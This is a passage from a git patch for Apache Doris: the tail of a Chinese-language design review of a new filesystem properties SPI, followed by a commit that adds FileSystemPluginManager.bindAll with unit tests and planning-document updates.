s3.secret_key must be set together") + .requireAllIfPresent(externalId, new String[]{roleArn}, "s3.external_id must be used together with s3.role_arn") + .check(() -> StringUtils.isBlank(endpoint) && StringUtils.isBlank(region), "Either s3.endpoint or s3.region must be set") + .check(this::hasInvalidUsePathStyle, "use_path_style must be true or false...") + .validate("Invalid S3 filesystem properties"); + } + @Override public Optional toBackendProperties() { return Optional.of(this); } + @Override public Map toMap() { return toFileSystemKv(); } // AWS_* BE map + @Override public Map toHadoopConfigurationMap() { /* fs.s3a.* */ } + @Override public String toString() { return ConnectorPropertiesUtils.toMaskedString(this); } // 脱敏 +} +``` + +每个 S3 兼容厂商的差异点:默认调优值(S3 = 50/3000/1000,OSS/COS/OBS = 100/10000/10000)、endpoint/region 互推规则、Hadoop impl key(`fs.s3a.*` vs `fs.cosn.*` vs `fs.obs.*`)、原生 SDK 选择等。 + +--- + +## 4. 新旧对比 + +| 维度 | 旧(fe-core `datasource.property.storage`)| 新(fe-filesystem `filesystem.properties`)| +|---|---|---| +| `StorageProperties` 形态 | **抽象类**(`extends ConnectionProperties`)| **接口**(纯 JDK)| +| 扩展方式 | 继承胖基类 + 重写钩子 | 实现窄接口 + 组合(一个类实现 4 个接口)| +| 类型分发 | 硬编码 `PROVIDERS` lambda 列表 + `guessIsMe` 启发式(封闭,新增厂商要改中心列表)| `FileSystemProvider.supports(Map)` + ServiceLoader/插件目录发现(开放,无中心注册表)| +| Hadoop 依赖 | 基类**直接持有** `org.apache.hadoop.conf.Configuration` 字段 | api 只返回 `Map`,由调用方/ provider 物化 Configuration | +| Thrift/Cloud 依赖 | `S3Properties` 内含 `TS3StorageParam`/`ObjectStoreInfoPB` 转换 | api 把 RPC 结构挡在外面,留给 fe-core adapter(adapter 尚未实现)| +| 模块位置 | 全在 `fe-core`,反向依赖 fe-core | 独立模块树,零 fe-core 回边 | +| 可选能力 | (无统一机制)| `FileSystem.capability(Class)` / `requireCapability`(取代 instanceof)| +| 绑定/脱敏工具 | `@ConnectorProperty` + `ConnectorPropertiesUtils`(已搬到 `fe-foundation`)| **同一套**(`fe-foundation`,新旧共用)| +| 是否被线上消费 | **是**(83 个 fe-core 引用方)| **否**(0 个 fe-core 引用方,休眠)| + +**注意:绑定/脱敏的反射工具(`@ConnectorProperty` / `ConnectorPropertiesUtils`)已先一步抽到叶子模块 `fe-foundation`,新旧模型都 import 它。** 这是两套模型能并存、且新模型不必依赖 fe-core 的关键基础设施。 + +--- + +## 5. SPI/API 设计评审(解耦 / 接口合理性 / 清晰度) + +三路对抗式评审打分(关键论断均经 `grep` 验证): + +| 评审视角 | 维度 | 分(满10) | +|---|---|---| +| 解耦与模块边界 | fe-core 解耦 / 模块分层 / 依赖方向 / provider 独立性 | 7 / 9 / 9 / 8 | +| 接口与 SPI 工效 | 命名清晰度 / SPI 流程一致性 / 能力模型 / 新 provider 扩展性 | 4 / 4 / 5 / 6 | +| 清晰度与迁移 | 过渡期清晰度 / 新旧功能对等 / 迁移完整性 / 测试覆盖 | 4 / 5 / 3 / 7 | + +### 5.1 优点(值得肯定) + +1. **真正的纯净 api。** `fe-filesystem-api` 零三方依赖、零 fe-core import;`BackendStorageProperties.toMap()` / `HadoopStorageProperties.toHadoopConfigurationMap()` 都只返回 `Map`,把 Thrift / Hadoop `Configuration` / AWS SDK 全部挡在外面。这是相对旧模型(基类内嵌 Hadoop `Configuration`)的一次干净的**依赖反转**。 +2. **无环、单向的依赖图**,pom 与源码两级核验:`api ← spi(+extension-spi) ← provider(+foundation)`,`fe-core → api+spi`。没有任何 provider 模块声明 `fe-core` 依赖。 +3. **fe-core 编译 classpath 已剥离到只剩 api+spi**,provider 运行期插件加载——物理上杜绝了 fe-core 在编译期引用具体 provider。 +4. **脱敏解耦得很漂亮**:`sensitivePropertyKeys()`(= `ConnectorPropertiesUtils.getSensitiveKeys(XxxProperties.class)`,以 `@ConnectorProperty(sensitive=true)` 为唯一真相源)在 provider 注册时被 `FileSystemPluginManager` 聚合进 `DatasourcePrintableMap`,fe-core 无需编译期依赖任何具体 provider 属性类。 +5. **`use_path_style` 解析收敛到唯一一处**且对非法值 fail-fast,是相对旧“静默当 false”的一处实打实的正确性改进。 +6. **迁移友好的 default 方法策略**:未迁移 provider 只实现 `supports`+`create(Map)`,与已迁移 provider 共存,不强制 big-bang。 + +### 5.2 缺陷与风险(按严重度) + +**[MAJOR] 整套强类型 SPI 是“到货即死代码”(dead-on-arrival)。** 已核验:fe-core 对 `filesystem.properties.*` 的 import 数 = **0**;`bind` / `createUntyped` / `toBackendProperties` / `toHadoopProperties` 在 fe-filesystem 树之外**零调用方**。线上桥 `FileSystemFactory.getFileSystem(StorageProperties)` 接收的是**旧类型**,经 `StoragePropertiesConverter.toMap()` 拍平后走 `create(Map)`。连已迁移的 typed provider 也把 `create(Map)` 内部塌缩成 `create(bind(props))`——**强类型对象从不跨越 fe-core/SPI 边界**。也就是说,SPI 一半以上的“卖点表面积”当前是脚手架。 + +**[MAJOR] “后续删除 fe-core StorageProperties”短期不现实。** 阻塞项(全部核验): +- 83 个 fe-core 文件仍 import `datasource.property.storage.*`; +- 桥 `FileSystemFactory.getFileSystem(StorageProperties)` + `StoragePropertiesConverter` 仍消费旧类型; +- BE/Hadoop 配置生成仍走旧 `getBackendConfigProperties()` / `getHadoopStorageConfig()`(约 40 处,含 `CatalogProperty`、`CredentialUtils`、Paimon/Iceberg metastore 属性); +- 旧 `S3Properties` 的 Cloud-proto / thrift 转换器在“无依赖的新 api”里**无处安放**(被刻意留给“fe-core adapter”,而该 adapter 尚不存在)。 + +**[MAJOR] 三处同名 `StorageProperties`。** `datasource.property.storage.StorageProperties`(旧胖类,在用)/ `property.storage.StorageProperties`(fe-property,paimon 用的近似拷贝)/ `filesystem.properties.StorageProperties`(新瘦接口)。同名不同形(两个 class + 一个 interface)在迁移边界上同时存在,IDE 自动 import、Javadoc、stack trace 都得靠包名消歧。**建议给新接口换个不同的名字**(如 `FsStorageContract` / 只保留 `FileSystemProperties`)。 + +**[MAJOR] 能力模型定义了却没接线。** 已核验:没有任何生产 `FileSystem`(S3/OSS/Azure…)覆盖 `capability()` 或实现 `*Capability`,唯一实现者/调用者是单测 `FileSystemCapabilityTest`。而真正在用的“可选能力”机制仍是底层 `ObjStorage` 的 `UnsupportedOperationException` 默认方法(`getStsToken`/`getPresignedUrl`/`deleteObjectsByKeys`)。于是仓库里**并存两套可选能力惯用法**,更好的那套(`capability()`)无人采用、无样例可抄。 + +**[MINOR] `FileSystemProperties` 相对 `StorageProperties` 零增量**——逐字重声明了全部 7 个方法,仅 Javadoc 更详细,无新方法、无行为差异。泛型上界完全可以直接写成 `

      `。建议合并为一个接口,或给 `FileSystemProperties` 一个真正的额外方法。 + +**[MINOR] 分类枚举大多是“纸面值”。** `BackendStorageKind.NATIVE/HDFS/BROKER/LOCAL` 零使用;只有 `S3_COMPATIBLE` 被返回;更糟的是 `NATIVE` 的 Javadoc 用 AZURE 举例,而 `AzureFileSystemProperties.backendKind()` 返回的却是 `S3_COMPATIBLE`,**provider 自我打脸**。 + +**[MINOR] 别名数组手抄漂移风险。** `S3FileSystemProvider.supports()` 把 `ENDPOINT_NAMES/ACCESS_KEY_NAMES/...` 当字面量重抄了一遍,必须与 `S3FileSystemProperties` 上的 `@ConnectorProperty(names=…)` 手工保持同步。应让 `supports()` 反射读取注解别名(单一真相源)。 + +**[MINOR] typed 迁移在新树内部也不齐。** HDFS/Local/Broker 只实现 `create(Map)`,`bind`/`create(P)` 继承默认抛异常——任何想统一按 typed 契约编程的代码,对这三个 provider 会 runtime 抛 `UnsupportedOperationException`。 + +**[MINOR] fe-core 与 provider 之间仍是“魔法字符串”契约。** `StoragePropertiesConverter` 注入 `_STORAGE_TYPE_`/`AWS_*`/`AZURE_*` 等 marker key,provider 的 `supports()` 再去识别它们;这套字符串契约半在 fe-core、半在 provider,正是 typed `bind()` 想消灭、却尚未启用的东西。 + +**[NIT]** `PluginFactory.create()`(无参)被迫覆盖抛异常,是复用 `PluginFactory` 作发现基类带来的契约泄漏;`name()` 默认实现形同虚设(8 个 provider 全部自行覆盖);`FileSystemType` 自带 TODO 承认 3+ 套 fs 类型定义待统一;**缺少新旧输出等价性测试**(默认调优值已分叉,正是该被 pin 的)。 + +--- + +## 6. 本次 commit 对 fe-core 的真实改动面(很小) + +新模型本身**没有改动任何 fe-core 调用方**。fe-core 的全部改动是非行为性的: + +- `DatasourcePrintableMap` 新增 `registerSensitiveKeys(Collection)` 作为脱敏聚合 sink: + ```java + public static void registerSensitiveKeys(Collection keys) { + if (keys == null) return; + synchronized (SENSITIVE_KEY) { SENSITIVE_KEY.addAll(keys); } + } + ``` +- `FileSystemPluginManager` 在三处注册点调用上面的 sink; +- `S3Resource` / `AzureResource` 仅把 `UploadPartResult` 的 import 从 `filesystem.spi` 改到 `filesystem`(且**仍在 import 旧 `S3Properties`**,证明旧模型仍是承重的)。 + +线上桥本体: + +```java +// fe-core: FileSystemFactory.java:113 +public static org.apache.doris.filesystem.FileSystem getFileSystem(StorageProperties storageProperties) // ← 旧类型 + throws IOException { + return getFileSystem(StoragePropertiesConverter.toMap(storageProperties)); // ← 拍平成 Map 走老路 +} +``` + +--- + +## 7. 后续如何使用新模块(迁移指南) + +### 7.1 写一个新的 provider(推荐姿势) + +1. 新建模块 `fe-filesystem-xxx`,对 `fe-filesystem-spi`/`api` 用 `provided` scope,对 `fe-foundation` 用 `compile`。 +2. 写 `XxxFileSystemProperties implements FileSystemProperties[, BackendStorageProperties, HadoopStorageProperties, S3CompatibleFileSystemProperties]`,字段用 `@ConnectorProperty(names=…, sensitive=…)` 标注,提供 `static of(Map)`(内部 `bind` + `validate`)。 +3. 写 `XxxFileSystemProvider implements FileSystemProvider`: + ```java + @Override public XxxFileSystemProperties bind(Map p) { return XxxFileSystemProperties.of(p); } + @Override public FileSystem create(XxxFileSystemProperties p) { return new XxxFileSystem(p); } + @Override public FileSystem create(Map p) { return create(bind(p)); } + @Override public Set sensitivePropertyKeys() { + return ConnectorPropertiesUtils.getSensitiveKeys(XxxFileSystemProperties.class); + } + ``` +4. 在 `META-INF/services/org.apache.doris.filesystem.spi.FileSystemProvider` 注册,按 `plugin-zip.xml` 打包(jar 在 zip 根供 ServiceLoader 扫描,依赖放 `lib/`,api/spi/extension-spi 用 provided 不打进 lib/)。 + +### 7.2 接口调用示例(均取自单测,可直接对照) + +**(a) 强类型主流程 `bind → create(P)`:** +```java +OssFileSystemProvider provider = new OssFileSystemProvider(); +OssFileSystemProperties props = provider.bind(Map.of("oss.endpoint", "https://oss-cn-hangzhou.aliyuncs.com")); +FileSystem fs = provider.create(props); +assertEquals("OSS", props.providerName()); +assertEquals(StorageKind.OBJECT_STORAGE, props.kind()); +assertInstanceOf(OssFileSystem.class, fs); // OssFileSystem extends S3CompatibleFileSystem +``` + +**(b) 类型擦除的逃生口 `createUntyped`(静态类型未知时):** +```java +@SuppressWarnings("unchecked") +default FileSystem createUntyped(FileSystemProperties properties) throws IOException { + return create((P) properties); // 依赖注册表已用 supports() 预选到匹配 provider,否则运行期 ClassCastException +} +``` + +**(c) 兼容/遗留路径 `create(Map)`(当前 fe-core 唯一实际走的):** +```java +@Override public FileSystem create(Map properties) throws IOException { + return create(bind(properties)); +} +``` + +**(d) 可选能力 `capability` / `requireCapability`:** +```java +// 消费者 +PresignedUrlCapability cap = fs.requireCapability(PresignedUrlCapability.class); // 不存在则抛 UnsupportedOperationException(含类型名) +Optional maybe = fs.capability(PresignedUrlCapability.class); +// provider 侧实现 +@Override public Optional capability(Class t) { + if (t == PresignedUrlCapability.class) return Optional.of(t.cast(presignedUrl)); + return Optional.empty(); +} +``` + +**(e) 转换视图 `toBackendProperties` / `toHadoopProperties`:** +```java +BackendStorageProperties be = S3FileSystemProperties.of(raw).toBackendProperties().orElseThrow(); +assertEquals(BackendStorageKind.S3_COMPATIBLE, be.backendKind()); +assertEquals("https://minio.local", be.toMap().get("AWS_ENDPOINT")); // BE 侧 AWS_* map + +Map hadoop = S3FileSystemProperties.of(raw).toHadoopProperties().orElseThrow().toHadoopConfigurationMap(); +assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", hadoop.get("fs.s3a.impl")); // fs.s3a.* map +``` + +**(f) 原始/匹配视图 + 脱敏:** +```java +S3FileSystemProperties p = S3FileSystemProperties.of(raw); +p.rawProperties(); // 原始输入 +p.matchedProperties().get("s3.endpoint"); // 实际命中的别名子集 +p.toString(); // secretKey=*** / sessionToken=*** ,accessKey/endpoint 明文 +new S3FileSystemProvider().sensitivePropertyKeys(); // 含 s3.secret_key/s3.session_token,不含 access_key +``` + +**fe-core 侧脱敏闭环(无编译期 provider 依赖):** +```java +manager.registerProvider(provider); // 内部把 provider.sensitivePropertyKeys() 折叠进 DatasourcePrintableMap.SENSITIVE_KEY +``` + +### 7.3 要真正“替换旧模型”,必须做的事(按优先级) + +1. **先翻桥,再谈解耦**:改写 `FileSystemFactory` / `StoragePropertiesConverter`,让它用 `provider.bind()` + `createUntyped()` 传递强类型 `FileSystemProperties`,从而让 `toBackendProperties()`/`toHadoopProperties()` 真正“活”起来。在此之前,整套 typed api/spi 只能算脚手架,不是已交付的抽象。 +2. **公布 83 个调用方的迁移序列**(建议 TVF → catalog → backup/resource),并把 40 处 BE/Hadoop 配置生成点从旧 `getBackendConfigProperties`/`getHadoopStorageConfig` 切到新转换视图。 +3. **理清三套树**:明确 `fe-property`(paimon)与 `fe-filesystem` 的关系——是被新 api 收编,还是作为独立产物保留,需白纸黑字写下来,否则“单一真相源”无从谈起。 +4. **补齐 HDFS/Local/Broker 的 typed `bind()`/`create(P)`**,或显式声明它们永久 map-only。 +5. **加新旧等价性测试**:对代表性的 S3/OSS/COS/OBS/Azure/HDFS 输入,断言新 `toMap()`/`toHadoopConfigurationMap()` 与旧 `getBackendConfigProperties()`/`getHadoopStorageConfig()` 的 key/value 一致(含默认 region/timeout 调优值),守住未来切换的回归。 +6. **接线一个能力做样板**(如 `S3FileSystem` 暴露 `PresignedUrlCapability`),否则能力模型一直是“有定义无样例”。 +7. **加架构守门测试**(ArchUnit 或 CI grep gate):断言 api/spi 不 import `org.apache.hadoop`/`software.amazon`/`org.apache.thrift`/`org.apache.doris.{catalog,common,qe}`,把当前已核验的干净边界锁死,防回归。 +8. **改名消除三同名冲突**(成本极低、收益高,应在更多调用方引用新类型之前落地)。 + +--- + +## 8. 附:本报告关键事实的独立核验(grep) + +| 论断 | 核验结果 | +|---|---| +| fe-core import 新 `filesystem.properties` 的文件数 | **0** | +| fe-core import 旧 `datasource.property.storage` 的文件数 | **83** | +| `StoragePropertiesConverter.java` 是否存在 | 是 | +| 第三套 `fe-property/.../property/storage/StorageProperties.java` 是否存在 | 是 | +| 生产 `FileSystem` 覆盖 `capability()` | 无(仅 api 默认 + 单测)| +| fe-core 调用 `toBackendProperties`/`createUntyped` 次数 | **0** | +| 线上桥 `getFileSystem(StorageProperties)` 入参类型 | 旧类型,经 `StoragePropertiesConverter.toMap()` | + +--- + +*报告依据 commit `2a113a6` 的工作区状态生成。docker/e2e 未运行;本报告为静态代码与设计层面的分析。* From 0f50a135efdf9ea53588924a20aec5d5463f0109 Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 13:46:53 +0800 Subject: [PATCH 076/128] [P0-T02] fe-core: add FileSystemPluginManager.bindAll(rawMap) (D-009) Additive raw map -> List binder, the prerequisite for ConnectorContext.getStorageProperties() (P1-T02). Mirrors the existing createFileSystem provider loop but uses provider.bind() to collect ALL supporting providers' typed props (not first-match create()), matching legacy StorageProperties.createAll's one-entry-per-backend shape. Migrated providers (S3/OSS/COS/OBS/Azure) override bind(); legacy ones (HDFS/broker/local) inherit the default bind() that throws UnsupportedOperationException -> bindAll skips them (they contribute no typed props; the connector covers those via raw fs./dfs./hadoop. passthrough). Real provider validation errors propagate (fail-loud). TDD: 4 new tests in FileSystemPluginManagerTest pin the contract (collect-supporting / skip-non-supporting / skip-legacy-no-bind / empty); RED (5 errors on a throwing stub) -> GREEN (5/5). checkstyle 0. +34 lines, purely additive (no existing method touched). fe-core legacy datasource.property.storage package + all fe-filesystem modules untouched. Note (for P1-T02): real object-store providers are runtime directory plugins (Env.loadPlugins), not on fe-core's unit-test classpath, so the real-provider end-to-end path is covered by P1-T06 (docker). Also, getStorageProperties() will need the LIVE plugin-loaded manager (FileSystemFactory.pluginManager, currently private/no getter) -> P1-T02 needs a FileSystemFactory static accessor (3rd fe-core file). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../doris/fs/FileSystemPluginManager.java | 34 ++++ .../doris/fs/FileSystemPluginManagerTest.java | 169 ++++++++++++++++++ .../metastore-storage-refactor/HANDOFF.md | 6 +- .../metastore-storage-refactor/PROGRESS.md | 10 +- plan-doc/metastore-storage-refactor/tasks.md | 4 +- 5 files changed, 216 insertions(+), 7 deletions(-) diff --git a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java index 51bad3a55a34d3..90a8810a2cb939 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java +++ b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemPluginManager.java @@ -24,6 +24,7 @@ import org.apache.doris.extension.loader.LoadReport; import org.apache.doris.extension.loader.PluginHandle; import org.apache.doris.filesystem.FileSystem; +import org.apache.doris.filesystem.properties.StorageProperties; import org.apache.doris.filesystem.spi.FileSystemProvider; import org.apache.logging.log4j.LogManager; @@ -135,6 +136,39 @@ public FileSystem createFileSystem(Map properties) throws IOExce + properties.get("_STORAGE_TYPE_") + ". Registered providers: " + providerNames()); } + /** + * Binds the given raw properties against every registered provider that + * {@link FileSystemProvider#supports(Map)}, collecting each provider's typed + * {@link StorageProperties}. + * + *

      Unlike {@link #createFileSystem(Map)} (which uses only the first supporting provider to + * build one runtime FileSystem), this returns ALL supporting providers' bound property models — + * mirroring the legacy {@code StorageProperties.createAll(rawMap)} so a catalog configured with + * more than one backend (e.g. an object store plus HDFS) yields one entry per backend. + * + *

      Providers not yet migrated to typed binding (their {@link FileSystemProvider#bind(Map)} + * still throws {@link UnsupportedOperationException}: HDFS / broker / local) are skipped — they + * contribute no typed {@code StorageProperties} (the connector handles those backends via raw + * {@code fs.}/{@code dfs.}/{@code hadoop.} passthrough), matching the legacy object-store-only + * Hadoop config helper. Returns an empty list when nothing matches. Binding/validation errors + * from a migrated provider propagate (fail-loud), mirroring legacy {@code createAll}. + */ + public List bindAll(Map properties) { + List result = new ArrayList<>(); + for (FileSystemProvider provider : providers) { + if (!provider.supports(properties)) { + continue; + } + try { + result.add(provider.bind(properties)); + } catch (UnsupportedOperationException e) { + LOG.debug("FileSystemProvider {} supports the properties but has no typed binding; " + + "skipping in bindAll", provider.name()); + } + } + return result; + } + /** Registers a provider at highest priority. For testing overrides. */ public void registerProvider(FileSystemProvider provider) { providers.add(0, provider); diff --git a/fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemPluginManagerTest.java b/fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemPluginManagerTest.java index e6900ac3a8dff9..370fd63dd3f011 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemPluginManagerTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemPluginManagerTest.java @@ -19,13 +19,18 @@ import org.apache.doris.common.util.DatasourcePrintableMap; import org.apache.doris.filesystem.FileSystem; +import org.apache.doris.filesystem.FileSystemType; import org.apache.doris.filesystem.properties.FileSystemProperties; +import org.apache.doris.filesystem.properties.StorageKind; +import org.apache.doris.filesystem.properties.StorageProperties; import org.apache.doris.filesystem.spi.FileSystemProvider; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; import java.util.Collections; +import java.util.HashMap; +import java.util.List; import java.util.Map; import java.util.Set; @@ -54,4 +59,168 @@ public Set sensitivePropertyKeys() { Assertions.assertTrue( DatasourcePrintableMap.SENSITIVE_KEY.contains("PLUGIN_MANAGER_TEST_SECRET_ALIAS")); } + + // ---- bindAll (P0-T02 / D-009): raw map -> List ---- + + @Test + public void bindAll_collectsTypedPropertiesFromEverySupportingProvider() { + FileSystemPluginManager manager = new FileSystemPluginManager(); + FileSystemProperties s3Props = new FakeFsProps("S3"); + FileSystemProperties hdfsLikeProps = new FakeFsProps("HDFSLIKE"); + manager.registerProvider(bindingProvider("A", s3Props)); + manager.registerProvider(bindingProvider("B", hdfsLikeProps)); + + List bound = manager.bindAll(new HashMap<>()); + + // bindAll returns ALL supporting providers' bound props (unlike createFileSystem's first-match). + Assertions.assertEquals(2, bound.size()); + Assertions.assertTrue(bound.contains(s3Props)); + Assertions.assertTrue(bound.contains(hdfsLikeProps)); + } + + @Test + public void bindAll_skipsProvidersThatDoNotSupportTheProperties() { + FileSystemPluginManager manager = new FileSystemPluginManager(); + FileSystemProperties supported = new FakeFsProps("S3"); + manager.registerProvider(bindingProvider("supports", supported)); + manager.registerProvider(nonSupportingProvider("ignored")); + + List bound = manager.bindAll(new HashMap<>()); + + Assertions.assertEquals(1, bound.size()); + Assertions.assertSame(supported, bound.get(0)); + } + + @Test + public void bindAll_skipsLegacyProvidersWithoutTypedBinding() { + // HDFS/broker/local providers support() their props but have not migrated bind() -> the + // default throws UnsupportedOperationException. They contribute no typed StorageProperties + // (the connector covers them via raw fs./dfs./hadoop. passthrough), so bindAll must skip + // them rather than blow up -- matching legacy createAll's object-store-only Hadoop scope. + FileSystemPluginManager manager = new FileSystemPluginManager(); + FileSystemProperties typed = new FakeFsProps("S3"); + manager.registerProvider(bindingProvider("typed", typed)); + manager.registerProvider(legacyProviderThatSupportsButCannotBind("legacyHdfs")); + + List bound = manager.bindAll(new HashMap<>()); + + Assertions.assertEquals(1, bound.size()); + Assertions.assertSame(typed, bound.get(0)); + } + + @Test + public void bindAll_returnsEmptyListWhenNoProviderSupports() { + FileSystemPluginManager manager = new FileSystemPluginManager(); + manager.registerProvider(nonSupportingProvider("none1")); + manager.registerProvider(nonSupportingProvider("none2")); + + List bound = manager.bindAll(new HashMap<>()); + + Assertions.assertTrue(bound.isEmpty()); + } + + // NOTE: real object-store providers (S3/OSS/COS/OBS) are runtime directory-loaded plugins + // (Env.loadPlugins), NOT on fe-core's unit-test classpath (fe-core pom: "fe-filesystem impl + // modules: runtime dependencies removed in Phase 4 P4.1"). End-to-end binding against the real + // providers is therefore covered by P1-T06 (docker / full plugin classpath), not here. + + // ---- helpers ---- + + private static FileSystemProvider bindingProvider( + String name, FileSystemProperties bound) { + return new FileSystemProvider() { + @Override + public boolean supports(Map properties) { + return true; + } + + @Override + public FileSystemProperties bind(Map properties) { + return bound; + } + + @Override + public FileSystem create(Map properties) { + return null; + } + + @Override + public String name() { + return name; + } + }; + } + + private static FileSystemProvider nonSupportingProvider(String name) { + return new FileSystemProvider() { + @Override + public boolean supports(Map properties) { + return false; + } + + @Override + public FileSystem create(Map properties) { + return null; + } + + @Override + public String name() { + return name; + } + }; + } + + private static FileSystemProvider legacyProviderThatSupportsButCannotBind( + String name) { + // No bind() override -> inherits the default that throws UnsupportedOperationException. + return new FileSystemProvider() { + @Override + public boolean supports(Map properties) { + return true; + } + + @Override + public FileSystem create(Map properties) { + return null; + } + + @Override + public String name() { + return name; + } + }; + } + + private static final class FakeFsProps implements FileSystemProperties { + private final String name; + + private FakeFsProps(String name) { + this.name = name; + } + + @Override + public String providerName() { + return name; + } + + @Override + public StorageKind kind() { + return null; + } + + @Override + public FileSystemType type() { + return null; + } + + @Override + public Map rawProperties() { + return Collections.emptyMap(); + } + + @Override + public Map matchedProperties() { + return Collections.emptyMap(); + } + } } diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index c8776cea174bd5..09be6adccae6f4 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -18,8 +18,10 @@ - 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧 进行中**。 - **范围已获批(2026-06-17 用户确认)= P0 + P1(storage 收口),做到 P1-T06 gate 停**。 - **P0-T01 ✅**(recon + 定向)→ **DV-001 / D-009**:缺 bind-all 入口,定机制 A(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +`FileSystemPluginManager.java`)。 -- **下一个:P0-T02**(实现 `FileSystemPluginManager.bindAll`,TDD)+ `P1-T01`(ConnectorContext 默认方法,可并行)。 -- 代码 commit:尚无(P0-T01 仅 plan-doc)。 +- **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,TDD 5 绿 + checkstyle 0,纯新增 34 行)。 +- **下一个:P1-T01**(`ConnectorContext.getStorageProperties()` 默认方法 + pom 边)。 +- ⚠️ **P1-T02 待解**:须经 `FileSystemFactory` static accessor 取 **live**(loadPlugins 过的)manager(fresh+loadBuiltins 无对象存储 provider)→ 第 3 个 fe-core 文件,P1-T02 前 AskUserQuestion。 +- 代码 commit:P0-T01(plan-doc)+ P0-T02(bindAll)。 ## 下一步(明确) 1. **等待用户批准 `tasks.md`(14 task,含 P3a)** 后进入 Implement。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 9e978075a9b1a3..772391f3ac6473 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,15 +10,16 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | █░░░░░░░░░ ~7% | 🚧 **进行中**(范围 P0+P1 已获批;P0-T01 ✅) | +| **Implement(实现)** | ██░░░░░░░░ ~14% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅ 完成) | -任务计数:**1 / 14** 完成(P0: 1/2 | P1: 0/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 +任务计数:**2 / 14** 完成(P0: 2/2 ✅ | P1: 0/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 --- ## 当前活跃 task -- **下一个:`P0-T02`**(fe-core `FileSystemPluginManager.bindAll`,D-009)+ `P1-T01`(ConnectorContext.getStorageProperties 默认方法,可并行)。 -- P0-T01 ✅ 已完成(recon + 定向):见下「待决」与 DV-001/D-009。 +- **下一个:`P1-T01`**(`ConnectorContext.getStorageProperties()` 默认方法 + `fe-connector-spi→fe-filesystem-api` 边)。 +- P0-T01 ✅(recon + 定向 DV-001/D-009)| P0-T02 ✅(`FileSystemPluginManager.bindAll`,TDD 5 绿 + checkstyle 0)。 +- ⚠️ **P1-T02 待解**:getStorageProperties 须用 **live**(已 loadPlugins 的)FileSystemPluginManager;该实例存于 `FileSystemFactory.pluginManager`(private、无 getter)→ 需在 `FileSystemFactory` 加 static accessor = **第 3 个 fe-core 文件**(白名单再 +1),P1-T02 前 AskUserQuestion。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -28,6 +29,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-17 **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,D-009):TDD(RED 5 错→GREEN 5 绿)+ checkstyle 0;纯新增 34 行不动既有方法。实证发现真对象存储 providers 是运行时目录插件(非 fe-core 单测 classpath)→ 删 real-S3 集成测试移交 P1-T06;并发现 P1-T02 须经 `FileSystemFactory` static accessor 取 live manager(第 3 fe-core 文件,待 AskUserQuestion)。 - 2026-06-17 **进入 Implement(范围 P0+P1 获批)**;**P0-T01 ✅**(4-agent recon 取证三套 StorageProperties + 连接器 seam):(1) F1 等价性=非阻塞(fe-filesystem 与 paimon 现 fe-property 路常见静态凭据键全等、为超集);(2) F2 可行性=阻塞(无 bind-all 入口,证伪白名单「唯一 fe-core 改动」)→ **DV-001**;用户定 **机制 A** → **D-009**(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +1)。已回写设计/WORKFLOW/decisions/risks/tasks。 - 2026-06-17 **3 设计点定稿(D-006/7/8)**(3-agent recon + 直读复核):**D-006** MetaStore 后端用 `MetaStoreProvider.supports()` 自识别 + ServiceLoader(镜像 `FileSystemProvider`),api 层**去掉** `MetaStoreType` 枚举;**D-007** Kerberos 抽**顶层中立叶子 `fe-kerberos`**(否决 fe-connector-auth:破 fe-filesystem↛fe-connector gate + fe-common 层级倒挂),分 P3a(paimon-local)/P3b(全量去重 follow-up);**D-008** vended 边界=连接器只抽取、fe-core 单点归一(现状已符合)。设计文档 §0/§2.3/§3.1/§3.2/§3.3/§3.5/依赖图已更新。 - 2026-06-17 调研完成(current state:paimon metastore 已与 fe-core 解耦、仅剩 storage 对 fe-property 一条边;三套同名 StorageProperties;fe-core metastore 28 文件 3624 LOC 矩阵;kerberos 三处实现)。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 18e93ea42835d0..3d592efe65cfb2 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -17,9 +17,10 @@ - **F2 可行性 = 阻塞**:**无** raw map → `List` 的 bind-all 入口(provider registry 私有,仅首个命中 `createFileSystem`)。`getStorageProperties()` **无法**只改 `DefaultConnectorContext`,须额外 additive `bindAll(...)`(fe-core 